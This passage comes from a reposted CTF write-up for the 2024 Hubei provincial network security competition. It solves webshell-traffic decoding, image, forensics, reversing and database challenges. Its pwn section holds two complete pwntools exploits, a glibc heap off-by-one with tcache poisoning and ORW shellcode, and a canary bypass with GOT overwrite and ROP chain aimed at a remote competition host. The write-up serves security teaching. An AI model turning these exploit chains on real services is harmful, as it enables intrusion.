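def decode_response(body: str, password: str, wordlist):
    """Split prefix / base64 payload / suffix, recover the key, decrypt."""
    if len(body) < 32:
        raise ValueError("response too short to carry both markers")
    prefix, blob, suffix = body[:16], body[16:-16], body[-16:]
    hit = recover_key(prefix, password, wordlist)
    if hit is None:
        return None
    candidate, key = hit
    # The suffix is the second half of the same digest, so it doubles
    # as a check that the prefix match was not a coincidence.
    if md5_hex(password + key)[16:] != suffix:
        raise ValueError("prefix matched but suffix did not")
    plain = gzip.decompress(xor_stream(base64.b64decode(blob), key))
    return candidate, key, plain


def build_sample(password: str, candidate: str, plaintext: bytes) -> str:
    """Constructed test data: wrap plaintext the way the three echo lines do."""
    key = derive_key(candidate)
    digest = md5_hex(password + key)
    blob = base64.b64encode(xor_stream(gzip.compress(plaintext), key)).decode()
    return digest[:16] + blob + digest[16:]


if __name__ == "__main__":
    words = ["123456", "letmein", "constructed-key"]  # constructed word list
    sample = build_sample("Antsword", "constructed-key", b"constructed output")
    print(decode_response(sample, "Antsword", words))
```

The two fixed-length hex markers around a base64 body are also what makes these responses easy to pick out of a capture.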

MISC.02

✦✦✦ 10 不良劫

Steps:

Reference link (2024 天山固网杯 finals):

https://blog.jacki.cn/2024/11/29/%E5%A4%A9%E5%B1%B1%E5%9B%BA%E7%BD%91/#CRYPTO-ddd

Adjust the levels in Photoshop so that the pixels that are not pure black become more visible.

Then restore and repair the positioning markers.

Scanning the code with WeChat gives the first half of the flag: DASCTF{014c6e74-0c4a-48fa

Extracting the blind watermark with WaterMarkH gives the second half of the flag: -8b33-ced16f847e39}

Flag:

DASCTF{014c6e74-0c4a-48fa-8b33-ced16f847e39}

MISC.03

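✦✦✦ 11 Mosaic (马赛克)

Steps:

Load the disk image with a tool.

There is an archive containing the flag, but opening it shows that the file is corrupted.

There is also a file named password.

It turns out to be an image. After changing the extension and opening it, the password is shown covered by a mosaic.

Shrinking the image makes it possible to guess that the password is ILIKEFORENSICS.

The disk image also contains an odd txt file, “打乱.txt”.

Exporting and opening it shows that it is the encryption algorithm.

After reversing it, delete the surplus zeros and extract the archive with the password to get the flag.

```
f = open('./flag.zip', 'rb').read()
n = open('./new.zip', 'wb')
L = len(f)
for i in range(int(L/10)):
    # each round writes 5 bytes from the front, then 5 bytes from the back
    n.write(f[5*i :5*i+5])
    n.write(f[L-5*i-5:L-5*i])
```

Restore the archive:

```
with open(r"C:\Users\Crazy\Desktop\flag.zip",'rb') as f:
    tmp = f.read()
L = len(tmp)
print(L)
o_f_zip = bytearray(L)
for i in range(L//10):
    # undo the interleaving: first 5 bytes go to the front, next 5 to the back
    o_f_zip[5*i:5*i+5] = tmp[10*i:10*i+5]
    o_f_zip[L-5*i-5:L-5*i] = tmp[10*i+5:10*i+10]
with open(r"C:\Users\Crazy\Desktop\flag2.zip",'wb') as f2:
    f2.write(o_f_zip)
```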
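An added round-trip example (not from the original write-up) showing where surplus zero bytes land in the restored archive. It assumes the exported file carries trailing zero padding, which the page does not state; the function names and sample bytes are constructed.

```python
def scramble(data: bytes) -> bytes:
    """The algorithm from 打乱.txt: alternate 5 bytes taken from the
    front of the file with 5 bytes taken from the back."""
    L = len(data)
    out = bytearray()
    for i in range(L // 10):
        out += data[5 * i:5 * i + 5]
        out += data[L - 5 * i - 5:L - 5 * i]
    return bytes(out)


def unscramble(tmp: bytes) -> bytes:
    """Inverse mapping, as in the restore script."""
    L = len(tmp)
    out = bytearray(L)
    for i in range(L // 10):
        out[5 * i:5 * i + 5] = tmp[10 * i:10 * i + 5]
        out[L - 5 * i - 5:L - 5 * i] = tmp[10 * i + 5:10 * i + 10]
    return bytes(out)


def drop_middle_padding(restored: bytes, pad_len: int) -> bytes:
    """Padding appended to the scrambled file ends up in the middle of the
    restored one, so cut pad_len bytes out of the centre."""
    half = (len(restored) - pad_len) // 2
    return restored[:half] + restored[half + pad_len:]


if __name__ == "__main__":
    original = bytes(range(1, 41))            # constructed 40-byte "file"
    padded = scramble(original) + b"\x00" * 13  # constructed trailing padding
    restored = unscramble(padded)
    print(restored.hex())                      # zero run sits in the middle
    print(drop_middle_padding(restored, 13) == original)
```

If the original length is not a multiple of 10, `scramble` silently drops the middle `L % 10` bytes and the file cannot be fully restored.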

MISC.04

✦✦✦ 12 Special Traffic (特殊的流量)

Steps:

Looking at the packets with response code 200, one of them carries an archive.

The key can be seen after its characters were substituted.

edffd5be04cc060e343cad479a8b845c is the MD5 hash of the secret.

```
import hashlib
import itertools

# Original MD5 hash
original_md5 = "edffd5be04cc060e343cad479a8b845c"
# Ciphertext after substitution
ciphertext = "xx34d619x1brxgd9mgd4xzxwxytv669w\n"
# Replacement character set
replacement_chars = ['i', '7', 'x']
# Positions of x
x_positions = [i for i, char in enumerate(ciphertext) if char == 'x']

# Every x position is filled with each of the replacement characters in turn
def generate_candidates():
    # Generate all possible replacement combinations
    for replacement in itertools.product(replacement_chars, repeat=len(x_positions)):
        # Put the replacement characters into the ciphertext at their positions
        candidate = list(ciphertext)
        for pos, replacement_char in zip(x_positions, replacement):
            candidate[pos] = replacement_char
        yield ''.join(candidate)

# Compare the MD5 of every candidate
def crack():
    for candidate in generate_candidates():
        # Compute the MD5 of the candidate
        candidate_md5 = hashlib.md5(candidate.encode()).hexdigest()
        if candidate_md5 == original_md5:
            print(f"Found the original ciphertext: {candidate}")
            return candidate
    print("No match found.")
    return None

if __name__ == "__main__":
    # Run the cracking process
    crack()
```

The brute force yields the plaintext:

i734d619i1brigd9mgd4xz7w7ytv669w

Reading further, a block of ciphertext is written to flag.txt:
U2FsdGVkX18tplkP51SopY26cczUyjuT8tP9j3Ofqv5XF5njA7CygY125iYhxplSQTNoT/kcwoN1z+4a4r/+9JtONfutcHXoyCv2tLseBHr802V/RRtFaZnZc3DM/trRmjk5SAyMSgvN+laSp6uK8eAOq7yKWq7FI+En5cu+j7+bxiuceviSoJ9gEw3SfEMtz4rYbKHagq8aCAlKPEevM+HVSnGSrMoy6QS8oQPgHkafdVj2m1HmfkdQFL5q7qYvrxVlRLbm657I0VIIusf8Q6+rsvlh28HrE3MzLlu6fd/cQ7nsZKuKYo0u4pc/yvI3RZglrd7Fb6piO4ryhs2g1g==

Decrypt it with a tool.

In the output, the English words that are not digits are reduced to their first letters; converting the result gives the flag.

Flag:

DASCTF{3fd34b59-4e9d-4390-927b-1346d5364d99}

MISC.05

✦✦✦ 13 PixMatrix

Steps:

As the challenge description says, applying a block-wise transpose to the image is enough.

```
from PIL import Image
import numpy as np

def swap_quadrants(block):
    """
    Swaps the top-right and bottom-left quadrants of an 8x8 block.
    Parameters:
    block (numpy.ndarray): An 8x8 (or block_size x block_size) array representing the
    image block.
    Returns:
    numpy.ndarray: The block with swapped quadrants.
    """
    half = block.shape[0] // 2
    top_right = block[:half, half:].copy()
    bottom_left = block[half:, :half].copy()
    # Swap the quadrants
    block[:half, half:] = bottom_left
    block[half:, :half] = top_right
    return block

def blockwise_transpose(image, block_size=8):
    """
    Performs a block-wise transpose on the given image by swapping specific quadrants
    within each block.
    Parameters:
    image (PIL.Image.Image): The input image to be processed.
    block_size (int): The size of each block (default is 8).
    Returns:
    PIL.Image.Image: The transposed image.
    """
    width, height = image.size
    image_array = np.array(image)
    # Handle grayscale images by ensuring consistent dimensions
    if image_array.ndim == 2:
        image_array = image_array[:, :, np.newaxis]
    channels = image_array.shape[2]
    transposed_array = image_array.copy()
    for y in range(0, height, block_size):
        for x in range(0, width, block_size):
            # Extract the block
            block = image_array[y:y + block_size, x:x + block_size].copy()
            # Ensure the block is the correct size (it might be smaller at the edges)
            if block.shape[0] < block_size or block.shape[1] < block_size:
                continue
            # Swap quadrants within the block
            transposed_block = swap_quadrants(block)
            # Assign the transposed block back to the array
            transposed_array[y:y + block_size, x:x + block_size] = transposed_block
    # Remove the singleton dimension for grayscale images
    if transposed_array.shape[2] == 1:
        transposed_array = transposed_array.reshape((height, width))
    return Image.fromarray(transposed_array)

def process_image(input_path, output_path, block_size=8, display=False):
    """
    Processes the image by performing a block-wise transpose and saves the result.
    Parameters:
    input_path (str): Path to the input image.
    output_path (str): Path to save the transposed image.
    block_size (int): The size of each block (default is 8).
    display (bool): Whether to display the transposed image (default is False).
    """
    try:
        # Open the image
        with Image.open(input_path) as img:
            # Perform block-wise transpose
            transposed_img = blockwise_transpose(img, block_size)
            # Save the transposed image
            transposed_img.save(output_path)
            print(f"Transposed image saved as {output_path}.")
            # Optionally display the image
            if display:
                transposed_img.show()
    except Exception as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    # Define input and output paths
    input_image_path = "PixMatrix.jpg"  # Update with your image file
    output_image_path = "transposed_image.jpg"  # Update with desired output path
    # Process the image
    process_image(input_image_path, output_image_path, block_size=8, display=True)
```

REVERSE.01

✦✦✦ 14 bouquet

Steps:

The binary is 32-bit and not packed. The challenge description says it contains junk instructions (花指令), so look for the code highlighted in red.

Press U to undefine and C to convert to code, nop out the junk bytes, then press P to analyse the function; this removes the junk instructions.

Shift+F12

A suspicious string turns up.

Dynamic debugging shows that the check is a byte-by-byte comparison.

So a script is written to brute-force it:

```
import subprocess
import time

def execute_process_with_input_data(executable_path, input_payload, timeout=10):
    """
    Start the external program, interact with it through pipes, and return its stdout and stderr.
    :param executable_path: path of the executable
    :param input_payload: input data passed to the external program
    :param timeout: timeout
    :return: (stdout, stderr) tuple
    """
    try:
        # Start the external process and interact with it through pipes
        process_handler = subprocess.Popen(
            executable_path,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True
        )
        # Use communicate() to send the input and collect the output
        standard_output, error_output = process_handler.communicate(input=input_payload, timeout=timeout)
        return standard_output, error_output
    except subprocess.TimeoutExpired:
        process_handler.kill()  # Kill the process on timeout
        standard_output, error_output = process_handler.communicate()
        return "Execution Timed Out", error_output

def generate_input_payload(char_array, outer_index, test_char):
    """
    Build the input data from the outer index and the character set.
    :param char_array: current character array
    :param outer_index: outer index
    :param test_char: character currently being tested
    :return: the constructed input data
    """
    char_array[outer_index] = test_char  # Set the character at the current position
    return ''.join(char_array) + "\n"  # Build the input data

def check_output_lines(standard_output, expected_lines):
    """
    Check whether the number of output lines matches the expectation.
    :param standard_output: stdout of the external program
    :param expected_lines: expected number of output lines
    :return: True if the number of lines matches, otherwise False
    """
    output_lines = standard_output.split("\n")
    return len(output_lines) == expected_lines

def main():
    executable_path = "bouquet.exe"  # Path of the executable
    char_array = ['*'] * 25  # Initialize the character array
    char_set = 'j7aw_sC3addq4TAo}8_Fda{SD'  # Character set
    # Outer loop over character positions
    for outer_index in range(25):
        # Inner loop over the character set
        for test_char in char_set:
            # Build the input data
            input_payload = generate_input_payload(char_array, outer_index, test_char)
            # Run the process and collect the output
            standard_output, error_output = execute_process_with_input_data(executable_path, input_payload)
            # Compute the expected number of output lines
            expected_lines = 49 - outer_index * 2
            # Check whether the number of output lines matches
            if check_output_lines(standard_output, expected_lines):
                print(test_char, end="")  # Print the character if it matches
                break  # Leave the inner loop and test the next position

if __name__ == "__main__":
    main()
```

Flag:

DASCTF{asd48_daj7w_3adqo}

REVERSE.02

✦✦✦ 15 go_bytes

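Steps:

The challenge shows that the program is written in Go.

·  runtime_stringtoslicebyte() is probably a function that converts a string into a byte slice.

·  Inside the loop, some data appears to be processed and modified with bit operations (such as right shifts and bitwise OR). This may be encryption of the input data or the execution of some algorithm.

Stack space management: at startup the program checks whether the stack is large enough and requests more stack space if it is not.

Memory allocation and initialization: new objects are created with runtime_newobject() and their values are initialized.

Data processing and encryption: the code processes the data with complex bit operations, which may involve an encryption algorithm or a data transformation.

Data verification: the processed data is verified against what is expected. If the data does not match, the program exits and prints an error message.

File/stream operations: formatted input and output operations are performed in several places.

The data is verified by comparing v12[j] with the computed main_tmp ^ v8. If they do not match, the program prints an error message through fmt_Fprintln() and exits by calling os_Exit(v9).

```
import binascii

def generate_calculated_values(initial_value, num_values=40, multiplier=291, addend=1110, mask=0xFFFF):
    """
    Generate a series of values computed with the given formula.
    :param initial_value: initial value
    :param num_values: number of values to generate
    :param multiplier: multiplier
    :param addend: addend
    :param mask: bit mask that keeps the result within 16 bits
    :return: list of computed values
    """
    values = []
    current_value = initial_value
    for _ in range(num_values):
        current_value = (multiplier * current_value + addend) & mask  # Apply the formula and keep the result within 16 bits
        values.append(current_value)
    return values

def xor_data_with_values(data, values):
    """
    XOR the data element by element.
    :param data: raw data to process
    :param values: list of values used for the XOR
    :return: list of processed data
    """
    return [data[i] ^ values[i] for i in range(len(data))]

def modify_data_order(data):
    """
    Move the last byte of the data to the front and shift the other bytes back.
    :param data: input data
    :return: modified data
    """
    return bytes([data[-1]]) + data[:-1]

def main():
    # Raw data, in hexadecimal
    hex_numbers = [
        0x22B9, 0x0C9F8, 0x8C89, 0x0FF18, 0x1439, 0x4E0A, 0x2A8B, 0x7CB,
        0x0BDEB, 0x0FAAB, 0x3FFB, 0x784B, 0x9F1E, 0x4FEB, 0x4D0B, 0x0D08E,
        0x38BB, 0x0CBAE, 0x0D2CE, 0x913E, 0x0A6B, 0x0F03B, 0x507B, 0x398B,
        0x93DE, 0x3CCE, 0x459E, 0x4ABE, 0x553E, 0x316E, 0x33BE, 0x42FE,
        0x0CECE, 0x4DDE, 0x982B, 0x0A31B, 0x802E, 0x12EE, 0x0F67A, 0x0EB79
    ]
    # Initial value
    initial_value = 0xdead
    # Generate the values computed with the formula
    calculated_values = generate_calculated_values(initial_value)
    # XOR the raw data with them
    modified_numbers = xor_data_with_values(hex_numbers, calculated_values)
    # Convert the processed data into a hex byte string
    hex_data = binascii.hexlify(bytes(modified_numbers))
    # Move the last byte of that hex string to the front (a rotation by one hex digit)
    modified_data = modify_data_order(hex_data)
    # Print the result
    print("Modified Data:", modified_data)

# Run the main function
if __name__ == "__main__":
    main()
```

Flag: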

DASCTF{faddff8cb4d711edbb2294085339ce84}

REVERSE.03

✦✦✦ 16 Zistel

Steps:

It is an ELF file; load it into IDA.

Pressing F5 shows three lines of code; follow the first function.

Following it leads to a function named sub_10021BA.

Step into it.

Line 32 contains the string input.

The program evidently asks for input, but nothing more can be seen at this point, so use IDA remote debugging to find where the encryption happens.

A suspicious function shows up here.

It contains a lot of inline assembly.

It initializes registers and data on the stack.

It uses SIMD instructions for efficient data stores and loads.

It processes the input data iteratively, possibly performing some kind of encryption, hashing, or checksum computation. The computation uses the sub_100261B function and XOR operations.

Finally it stores the result in the xmm0 register and returns a value of type __int64.

Further down in the parent function there is a dword; double-click it.

It is probably the ciphertext; keep auditing.

This part performs some verification and contains the strings try again and correct.

This function shows XOR operations, byte swaps, and iterative processing.

Code:

```
#include <stdio.h>
#include <stdint.h>
#include <string.h>

typedef uint32_t uint32;

uint32 data1[] = {0x33293158, 0x60760211, 0x42185F46, 0x63746F29};
uint32 data2[] = {
    0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,
    0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,
    0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,
    0xBBDBD183, 0x05340F2E
};
uint32 lookup_table[0x100];

void byte_swap(uint32 *num) {
    unsigned char *byte_ptr = (unsigned char*) num;
    unsigned char temp;
    for (int i = 0; i < 2; ++i) {
        temp = byte_ptr[i];
        byte_ptr[i] = byte_ptr[3 - i];
        byte_ptr[3 - i] = temp;
    }
}

int main() {
    // Initialize lookup_table
    for (int i = 0; i < 0x100; ++i) {
        lookup_table[i] = i & 3;
    }
    for (int idx = 0; idx < 4; idx += 2) {
        uint32 first = data1[idx];
        uint32 second = data1[idx + 1];
        for (int j = 19; j >= 0; --j) {
            uint32 temp = second;
            second ^= data2[j];
            for (int k = 0; k < 4; ++k) {
                uint8_t temp_idx = lookup_table[(data2[j] >> (k * 8)) & 0xff];
                uint8_t temp_val = (second >> (k * 8)) & 0xff;
                unsigned char second_byte_array[4];
                memcpy(second_byte_array, &second, sizeof(second));
                unsigned char tmp = second_byte_array[k];
                second_byte_array[k] = second_byte_array[temp_idx];
                second_byte_array[temp_idx] = tmp;
                memcpy(&second, second_byte_array, sizeof(second));
            }
            second ^= data2[j];
            second ^= first;
            first = temp;
        }
        // The listing on the page ends here; the output step is not shown.
    }
    return 0;
}
```

Flag:

DASCTF{z1g_I3_S0_Coo0l!}

PWN.01

✦✦✦ 17 EZheap_2

Steps:

An off-by-one vulnerability in a heap menu challenge. The standard template builds overlapping chunks. Show can leak either the PIE address or the heap address; the PIE address is chosen here, which allows a tcache bin attack on stdout to leak the libc address, after which the standard glibc 2.27 ORW template finishes the job.

Code:

```
from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
import gmpy2
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_addr1():
    return u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('', )
elf = ELF('./pwn')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc=ELF("/root/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6")
def cmd(i):
    sla(b'Your choice:',str(i))
def add(idx,size):
    cmd(1)
    sla(b'index:',str(idx))
    sla(b'Size:',str(size))
def edit(idx,con):
    cmd(2)
    sla(b'index:',str(idx))
    sa(b'context:',con)
def free(idx):
    cmd(3)
    sla(b'index:',str(idx))
def show(idx):
    cmd(4)
    sla(b'choose:',str(idx))
add(0,0x18)  #0
add(1,0x68)  #1
add(2,0x68)  #2
add(3,0x18)  #3
add(10,0x68)  #2
add(11,0x68)  #2
edit(0,b'\x00'*0x18+p8(0xe1))
free(1)
add(4,0xd8)
show(4)
rl(b'\n')
pie=int(p.recv(14),16)-0x202160
free(10)
free(11)
free(2)
edit(4,b'a'*0x68+p64(0x71)+p64(pie+0x202020))
add(5,0x68)
add(6,0x68)
add(7,0x68)
edit(7,p64(0xfbad1800) + p64(0)*3 + b'\x00')
libc_base=get_addr()-0x3ed8b0
li(hex(libc_base))
rdi = libc_base+libc.search(asm("pop rdi\nret")).__next__()
rsi = libc_base+libc.search(asm("pop rsi\nret")).__next__()
rdx = libc_base+libc.search(asm("pop rdx\nret")).__next__()
rax = libc_base+libc.search(asm("pop rax\nret")).__next__()
ret = libc_base+libc.search(asm("ret")).__next__()
syscall=libc_base+libc.search(asm("syscall\nret")).__next__()
jmp_rsp=libc_base+libc.search(asm("jmp rsp")).__next__()
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']+53
open_addr=libc_base+libc.sym['open']
read_addr=libc_base + libc.sym['read']
write_addr=libc_base + libc.sym['write']
payload=(b'\x00'*0x68+p64(0)+p64(free_hook&0xfffffffffffff000)+p64(0)*2+p64(0x2000)).ljust(0xa0,b'\x00')+p64(free_hook&0xfffffffffffff000)+p64(syscall)
free(5)
edit(4,b'\x00'*0x68+p64(0x71)+p64(free_hook))
add(5,0x68)
add(6,0x68)
edit(6,p64(setcontext))
add(15,0x400)
edit(15,payload)
free(15)
payload  = p64(rdi)+p64(free_hook&0xfffffffffffff000)
payload += p64(rsi)+p64(0x1000)
payload += p64(rdx)+p64(7)
payload += p64(rax)+p64(10)
payload += p64(syscall)
payload += p64(jmp_rsp)
payload += asm(shellcraft.open('/flag'))
payload += asm(shellcraft.read(3,free_hook+0x300,0x30))
payload += asm(shellcraft.write(1,free_hook+0x300,0x30))
sl(payload)
inter()
```

Flag:

DASCTF{10737193860912531286748686403102}

PWN.02

✦✦✦ 18 Inequable Canary

Steps:

This is the original challenge from 源鲁杯; apart from the interaction, everything is the same.

Link:

https://xz.aliyun.com/t/15840?time__1311=GqjxnDgDyC0QDsD7zG7W%3DqxWw8iVWiW4D#toc-4

Code:

```
from pwn import*
def s(a):
  p.send(a)
def sa(a,b):
  p.sendafter(a,b)
def inter():
  p.interactive()
context(log_level = 'debug',arch = 'amd64')
p=remote("139.155.126.78",27641)
elf=ELF('./canary')
vuln=0x400820
stack_fail_got=0x601038
sa("Say some old spells to start the journey\n",p64(vuln))
sa("Tell me the location of the Eye of the Deep Sea\n",b'a'*8+p64(stack_fail_got))
sa("I have magic\n",p64(0x400a5f)) #pop 3
pop_rdi=0x400a63
pop_rsi_r15=0x400a61
read_got=0x601040
write_addr=0x4006E0
payload=p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(write_addr)+p64(vuln)
sa("Let's go!\n",payload)
libc_base=u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))-0x10e1e0
bss=0x601060+0x800
sa("Tell me the location of the Eye of the Deep Sea\n",b'a'*8+p64(bss))
sa("I have magic\n",b'flag\x00\x00\x00\x00') #pop 3
pop_rdi=0x400a63
pop_rsi_r15=0x400a61
read_got=0x601040
write_addr=0x4006E0
pop_rax=libc_base+0x36174
pop_rdx_r12=libc_base+0x119431
syscall_ret=libc_base+0x47656 #syscall pop_rbp ret
payload=p64(pop_rdi)+p64(bss)+p64(pop_rsi_r15)+p64(0)*2+p64(pop_rax)+p64(2)+p64(syscall_ret)+p64(0) #open
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi_r15)+p64(bss+0x100)*2+p64(pop_rdx_r12)+p64(0x100)*2+p64(pop_rax)+p64(0)+p64(syscall_ret)+p64(0)#read
payload+=p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(bss+0x100)*2+p64(pop_rdx_r12)+p64(0x100)*2+p64(pop_rax)+p64(1)+p64(syscall_ret)+p64(0)
sa("Let's go!\n",payload)
inter()
```

Flag:

DASCTF{95400240268504043541865376132978}

DB.01

✦✦✦ 19 DB

Steps:

Extract the values with a regular-expression match.

Code:

```
import re
import csv

def validate_phone(phone):
    """
    Validates if a given phone number is a valid 11-digit number
    and matches the specified prefixes.
    """
    valid_prefixes = [
        '734', '735', '736', '737', '738', '739', '747', '748', '750', '751', '752', '757', '758', '759', '772',
        '778', '782', '783', '784', '787', '788', '795', '798', '730', '731', '732', '740', '745', '746', '755',
        '756', '766', '767', '771', '775', '776', '785', '786', '796', '733', '749', '753', '773', '774', '777',
        '780', '781', '789', '790', '791', '793', '799'
    ]
    return re.fullmatch(r'\d{11}', phone) and phone[:3] in valid_prefixes

# Read the data file, extract potential numbers, filter valid ones, and write to CSV
with open("a.txt", encoding="utf-8") as file:
    data = file.read()
potential_numbers = re.findall(r'\b\d{11}\b', data)
valid_numbers = [num for num in potential_numbers if validate_phone(num)]
output_data = [["category", "value"]] + [["phone", num] for num in valid_numbers]
with open("output.csv", mode="w", encoding="utf-8", newline="") as csvfile:
    writer = csv.writer(csvfile)
    writer.writerows(output_data)
print(f"Extracted {len(valid_numbers)} valid phone numbers. Results saved to output.csv.")
```

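-- End --

That is our write-up for this competition. If you have any questions, leave a comment or send a private message to the official account.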


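Originally published on the WeChat official account 天权信安: 2024 Hubei Provincial Network and Data Security Practical Skills Competition: 天权信安 WriteUp

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided for security research and teaching only. Readers who use this information for any other purpose bear all legal and joint liability themselves; this site bears no legal or joint liability. If there is a problem, contact us by e-mail (a corporate or otherwise valid mailbox is recommended so that the message is not blocked; contact details are on the home page).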
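  • Published on December 23, 2024, 10:57:52
  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for the hard work):
    2024 Hubei Provincial Network and Data Security Practical Skills Competition: 天权信安 WriteUp https://cn-sec.com/archives/3540853.html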